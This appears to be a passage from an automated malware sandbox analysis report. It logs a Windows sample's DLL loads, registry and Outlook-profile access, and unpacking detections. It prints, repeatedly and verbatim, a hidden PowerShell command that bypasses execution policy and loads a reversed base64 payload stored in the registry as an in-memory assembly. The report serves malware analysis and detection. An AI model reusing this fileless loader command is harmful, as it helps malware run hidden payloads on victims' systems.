Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\r\obj\Debug\r.pdb source: powershell.exe, 00000013.00000002.3747287199.00000264A3D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3760000554.000001D196BF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3724820036.000001A0801B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752869787.0000025E92558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3752191349.0000025E92350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000024.00000002.3749297403.000001681AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3769482999.0000023552108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3768807863.00000228AE168000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.3749628672.000001C3BD4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3790379244.0000021226A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.3772579364.0000017622038000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.000000000647C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727204863.0000000003A8C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1851502254.000000001FF0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\b\obj\Debug\b.pdb source: powershell.exe, 00000013.00000002.3746746994.00000264A3B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: xcopy.pdbUGP source: vbc.exe, 0000000D.00000002.1558397944.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000003.1637364094.0000000000AC8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 0000000D.00000002.1561009209.0000000005330000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.00000000038CE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.0000000003730000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1564493965.000000000357D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1557573634.00000000033CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\Desktop\Files\b 10 02 2025\b\obj\Debug\b.pdbtL source: powershell.exe, 00000013.00000002.3746746994.00000264A3B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 0000000D.00000002.1561009209.0000000005330000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000012.00000002.3726305608.00000000038CE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3726305608.0000000003730000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1564493965.000000000357D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1557573634.00000000033CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vbc.pdb source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3739542587.000000000647C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727204863.0000000003A8C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3727450782.0000000003FEC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1851502254.000000001FF0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: xcopy.pdb source: vbc.exe, 0000000D.00000002.1558397944.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, RNDzmzHPyfZMe3si.exe, 00000011.00000003.1637364094.0000000000AC8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3720190542.000000000041F000.00000002.00000001.01000000.00000006.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 19.2.powershell.exe.264a3b90000.0.raw.unpack, b.cs

.Net Code: b System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
